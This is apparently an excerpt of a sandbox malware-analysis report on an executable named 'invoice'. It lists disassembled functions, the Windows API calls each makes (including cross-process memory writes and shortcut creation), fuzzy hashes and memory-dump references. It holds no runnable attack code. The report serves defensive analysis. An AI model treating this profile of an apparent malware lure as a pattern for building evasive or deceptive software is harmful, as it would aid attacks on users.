                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                        • String ID:
                        • API String ID: 3741023627-0
                        • Opcode ID: c9691215d2cb2155fa6ca5bb2b9c641a5cd951179c571b5410caf503be5de630
                        • Instruction ID: 835e4601276121f7071ccf05dbf9700c2549460ca9007039fbc36956f703ed52
                        • Opcode Fuzzy Hash: c9691215d2cb2155fa6ca5bb2b9c641a5cd951179c571b5410caf503be5de630
                        • Instruction Fuzzy Hash: 2D01A230800306ABEB31AB20EC4EBA677B9FF04705F08025AE582A11D0DBE5A944EB80
                        Function 00F813B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                        Download Yara Rule
                        APIs
                        • EndPath.GDI32(?), ref: 00F813BF
                        • StrokeAndFillPath.GDI32(?,?,00FBBA08,00000000,?), ref: 00F813DB
                        • SelectObject.GDI32(?,00000000), ref: 00F813EE
                        • DeleteObject.GDI32 ref: 00F81401
                        • StrokePath.GDI32(?), ref: 00F8141C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Path$ObjectStroke$DeleteFillSelect
                        • String ID:
                        • API String ID: 2625713937-0
                        • Opcode ID: 5e868886e4b0af7a03dc367696c74af038c4a1aaecb18e154caaf75c267881bd
                        • Instruction ID: 8de39764fde118242c4c993da130d0d4a11cba899ef67f834e85390af35f8a18
                        • Opcode Fuzzy Hash: 5e868886e4b0af7a03dc367696c74af038c4a1aaecb18e154caaf75c267881bd
                        • Instruction Fuzzy Hash: D1F0CD740042099BEB329F56ED8C7983BA8B701326F188318F4A9594F8CB3A4596EF50
                        Function 00FEC423 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                        Download Yara Rule
                        APIs
                        • CoInitialize.OLE32(00000000), ref: 00FEC4BE
                        • CoCreateInstance.OLE32(01012D6C,00000000,00000001,01012BDC,?), ref: 00FEC4D6
                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                        • CoUninitialize.OLE32 ref: 00FEC743
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CreateInitializeInstanceUninitialize_memmove
                        • String ID: .lnk
                        • API String ID: 2683427295-24824748
                        • Opcode ID: 9bdada1c9d590730f0f5cc6606856d36b2852f862b0e1b7cccaaeb894b54b561
                        • Instruction ID: 06a7ce92f79251ef1a634b0f69de66d25f4c26a4cb46c845410d7c28c982a80f
                        • Opcode Fuzzy Hash: 9bdada1c9d590730f0f5cc6606856d36b2852f862b0e1b7cccaaeb894b54b561
                        • Instruction Fuzzy Hash: 5BA11971108205AFD304FF64CC91EABB7E8EF84704F14491CF1969B192DBB5EA09DB92
                        Function 00F92E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00FA0F36: std::exception::exception.LIBCMT ref: 00FA0F6C
                          • Part of subcall function 00FA0F36: __CxxThrowException@8.LIBCMT ref: 00FA0F81
                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                          • Part of subcall function 00F87BB1: _memmove.LIBCMT ref: 00F87C0B
                        • __swprintf.LIBCMT ref: 00F9302D
                        Strings
                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00F92EC6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                        • API String ID: 1943609520-557222456
                        • Opcode ID: 775b3f386b1b4f6f6a957158746266ac19c94588740c39d18dd2e49bdf748dbd
                        • Instruction ID: ab698c14cd759d1678017f7b6a909776749dbff2cbcdc3eb66d117d847d45281
                        • Opcode Fuzzy Hash: 775b3f386b1b4f6f6a957158746266ac19c94588740c39d18dd2e49bdf748dbd
                        • Instruction Fuzzy Hash: 32916A715083019FDB18FF24DD86DAEB7A4EF85710F04491DF4819B2A1EB24EE04EB52
                        Function 00FEB9C7 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F848A1,?,?,00F837C0,?), ref: 00F848CE
                        • CoInitialize.OLE32(00000000), ref: 00FEBA47
                        • CoCreateInstance.OLE32(01012D6C,00000000,00000001,01012BDC,?), ref: 00FEBA60
                        • CoUninitialize.OLE32 ref: 00FEBA7D
                          • Part of subcall function 00F89997: __itow.LIBCMT ref: 00F899C2
                          • Part of subcall function 00F89997: __swprintf.LIBCMT ref: 00F89A0C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                        • String ID: .lnk
                        • API String ID: 2126378814-24824748
                        • Opcode ID: 4b6a72135a1a04cc969d4b7b8c63624c040213dc7caa63d3af9d58a9a80de673
                        • Instruction ID: aa0b3fb9454974e09780b2543342579e6c0481564139874f7fbe9d0db7ddaa3d
                        • Opcode Fuzzy Hash: 4b6a72135a1a04cc969d4b7b8c63624c040213dc7caa63d3af9d58a9a80de673
                        • Instruction Fuzzy Hash: DAA187746043019FCB14EF15C884E6ABBE5FF88324F148988F89A9B3A1CB35ED45DB91
                        Function 00FA518D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                        Download Yara Rule
                        APIs
                        • __startOneArgErrorHandling.LIBCMT ref: 00FA521D
                          • Part of subcall function 00FB0270: __87except.LIBCMT ref: 00FB02AB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ErrorHandling__87except__start
                        • String ID: pow
                        • API String ID: 2905807303-2276729525
                        • Opcode ID: 73220158e01ffdd20ae6c6cfe1d457cccfeff9c252d42ba3582c748a3356db49
                        • Instruction ID: 3089069375fc52ee887cf23e3b4152d3e6d7c1aa1173bd0c691bfbf2bdc8638f
                        • Opcode Fuzzy Hash: 73220158e01ffdd20ae6c6cfe1d457cccfeff9c252d42ba3582c748a3356db49
                        • Instruction Fuzzy Hash: 285134B1E08605D7DB21A715C9453BF3BD4EB42B20F288958F4D686199EF398CC8BF46
                        Function 00FA017B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID: #$+
                        • API String ID: 0-2552117581
                        • Opcode ID: e173b186cc07ddae54832db60d7599f6c514095c99c498bc2c29d1316e796306
                        • Instruction ID: 432f43b70a48f483babf51f16e2b86b45ce3dfcb5b707db82319d0f922fc9a6f
                        • Opcode Fuzzy Hash: e173b186cc07ddae54832db60d7599f6c514095c99c498bc2c29d1316e796306
                        • Instruction Fuzzy Hash: A25101759043469FDF259F28D884BFA7BB5EF96720F184056E8919B390CB349C42EB60
                        Function 00F962F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _memset$_memmove
                        • String ID: ERCP
                        • API String ID: 2532777613-1384759551
                        • Opcode ID: f3805eac498890ee9d1b9a1c3e7d1cb9ab8e07b67afc699268f531a3d11785b5
                        • Instruction ID: 20a1cd0625dacc51b1b2dac20efc50b2526b39cae88565f3fdf340b5f1c14f0c
                        • Opcode Fuzzy Hash: f3805eac498890ee9d1b9a1c3e7d1cb9ab8e07b67afc699268f531a3d11785b5
                        • Instruction Fuzzy Hash: F851B171D00309DBDB24DF99C945BAAB7F8FF44314F20856EE54ACB240E775AA84EB80
                        Function 00FD9AB7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00FE17ED: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FD9558,?,?,00000034,00000800,?,00000034), ref: 00FE1817
                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00FD9B01
                          • Part of subcall function 00FE17B8: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FD9587,?,?,00000800,?,00001073,00000000,?,?), ref: 00FE17E2
                          • Part of subcall function 00FE170F: GetWindowThreadProcessId.USER32(?,?), ref: 00FE173A
                          • Part of subcall function 00FE170F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00FD951C,00000034,?,?,00001004,00000000,00000000), ref: 00FE174A
                          • Part of subcall function 00FE170F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00FD951C,00000034,?,?,00001004,00000000,00000000), ref: 00FE1760
                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FD9B6E
                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FD9BBB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                        • String ID: @
                        • API String ID: 4150878124-2766056989
                        • Opcode ID: b3ec1fe394e96a048a2399c98eb4fa4661b38557376b115b8ad5aeaa7d698bfb
                        • Instruction ID: dd95edf4be84a5e27689b335d42ad9d74424b5f1c069b2b60b9d9b4a4c61c04a
                        • Opcode Fuzzy Hash: b3ec1fe394e96a048a2399c98eb4fa4661b38557376b115b8ad5aeaa7d698bfb
                        • Instruction Fuzzy Hash: 94417E76900218BFDB10DFA5CC81EDEBBB9EB49710F00419AF955B7180CA756E85DB60
                        Function 01007978 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                        Download Yara Rule
                        APIs
                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0100F910,00000000,?,?,?,?), ref: 01007A11
                        • GetWindowLongW.USER32 ref: 01007A2E
                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 01007A3E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$Long
                        • String ID: SysTreeView32
                        • API String ID: 847901565-1698111956
                        • Opcode ID: 50100c2fcb932de2e6cb36b234585f58b598445bba44d17e9339a6ceb4960dd8
                        • Instruction ID: 998adac533e77165fbe42b8c49ba946d53360f7b40fcf90345f704f1cb53c19a
                        • Opcode Fuzzy Hash: 50100c2fcb932de2e6cb36b234585f58b598445bba44d17e9339a6ceb4960dd8
                        • Instruction Fuzzy Hash: E431D271200606ABEB629F38CC41BE67BA9FB49334F204725F9F5921D0C739F9909760
                        Function 0100740B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 01007493
                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 010074A7
                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 010074CB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend$Window
                        • String ID: SysMonthCal32
                        • API String ID: 2326795674-1439706946
                        • Opcode ID: 2857163c84725010b827c2257c5bf8484c9dc9bda14efa963fb23c4bb7142d44
                        • Instruction ID: 911f7ee03a2e94a4cbc0fdc3a24b253491b3a5085b01a2f9769f80df32b8724a
                        • Opcode Fuzzy Hash: 2857163c84725010b827c2257c5bf8484c9dc9bda14efa963fb23c4bb7142d44
                        • Instruction Fuzzy Hash: CD21B432500219ABEF228E94CC42FEA3BA9FF48724F110254FE946B1D1DB79B851DB90
                        Function 01007BC5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 01007C7C
                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 01007C8A
                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01007C91
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend$DestroyWindow
                        • String ID: msctls_updown32
                        • API String ID: 4014797782-2298589950
                        • Opcode ID: 13bec47cb1080df4666a16a8b7602076656a6c21aed6331e9621452a6350edf5
                        • Instruction ID: 7f120032376b757af24ca60214efa127cc6126e3fd8fa8229ac66afa49ecaa1d
                        • Opcode Fuzzy Hash: 13bec47cb1080df4666a16a8b7602076656a6c21aed6331e9621452a6350edf5
                        • Instruction Fuzzy Hash: 23217CB5600209AFEB52DF28DCC1DA737EDEB49354F04045DFA809B291DA35EC419BA0
                        Function 01006CE2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 01006D6D
                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 01006D7D
                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 01006DA2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend$MoveWindow
                        • String ID: Listbox
                        • API String ID: 3315199576-2633736733
                        • Opcode ID: 4cee5f97c3d3250380a5d56d1bd4c35fca118e10a4af0bde180cdbec733e4f3e
                        • Instruction ID: 418ed4c687f9f20dc0a1e4796cade53e98cc7dc691a7290f01c3cf2504b7376d
                        • Opcode Fuzzy Hash: 4cee5f97c3d3250380a5d56d1bd4c35fca118e10a4af0bde180cdbec733e4f3e
                        • Instruction Fuzzy Hash: 8621F832610118BFEF239F58DC44FBB37AAEF89754F008125F9449B1D0C6729C6197A0
                        Function 01007740 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 010077A4
                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 010077B9
                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 010077C6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: msctls_trackbar32
                        • API String ID: 3850602802-1010561917
                        • Opcode ID: b90b060f0d8e38cd859da097757f6b178c95339b36d37d015acd9a020a847026
                        • Instruction ID: d224d8d76a60d689f27e06dd9e447c25b2bd8b39ff8fac8a8c62b99cb1c5fe8b
                        • Opcode Fuzzy Hash: b90b060f0d8e38cd859da097757f6b178c95339b36d37d015acd9a020a847026
                        • Instruction Fuzzy Hash: FA11E772240208BBEF265F74CC45FEB7BADFF88754F010218F685960D0D676A411DB20
                        Function 00F84C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00F84C2E), ref: 00F84CA3
                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00F84CB5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: GetNativeSystemInfo$kernel32.dll
                        • API String ID: 2574300362-192647395
                        • Opcode ID: 2b6fc6d53e0668518204696c74174e1ac9bb8e23f4faed0b3aa323dfc49e5ba4
                        • Instruction ID: af5e986449b2f6826fa7e2cd02dd0346c59e96f3f26550c891c34e35ff91b70f
                        • Opcode Fuzzy Hash: 2b6fc6d53e0668518204696c74174e1ac9bb8e23f4faed0b3aa323dfc49e5ba4
                        • Instruction Fuzzy Hash: D9D01230911723CFD731AF31D91868676D9AF06751F11882D98C5D6540D678D880EB50
                        Function 00F84D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00F84CE1,?), ref: 00F84DA2
                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F84DB4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                        • API String ID: 2574300362-1355242751
                        • Opcode ID: 5a6653c7dd844d66aaa4d7c068a2ffbb228a33ac7cb65767fdb5b8a1ef9de0b0
                        • Instruction ID: 2333fff8a34fd2c3e65e9d868ebf83522abee2c1605ff0b9651259fcff767bf3
                        • Opcode Fuzzy Hash: 5a6653c7dd844d66aaa4d7c068a2ffbb228a33ac7cb65767fdb5b8a1ef9de0b0
                        • Instruction Fuzzy Hash: 45D01772950713CFD731AF32D818A8676E8AF06365F11882ED8C6DA550E7B4E880EB50
                        Function 00F84D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00F84D2E,?,00F84F4F,?,010452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F84D6F
                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F84D81
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                        • API String ID: 2574300362-3689287502
                        • Opcode ID: 001d4ba9c3b34ee6672bb280b657cb8df0a4597a418c14b3d8a51a861bdcc447
                        • Instruction ID: 2e12633df9c4733c73756469e0da85b22c96781ed160d22f70bfbb8d358d6419
                        • Opcode Fuzzy Hash: 001d4ba9c3b34ee6672bb280b657cb8df0a4597a418c14b3d8a51a861bdcc447
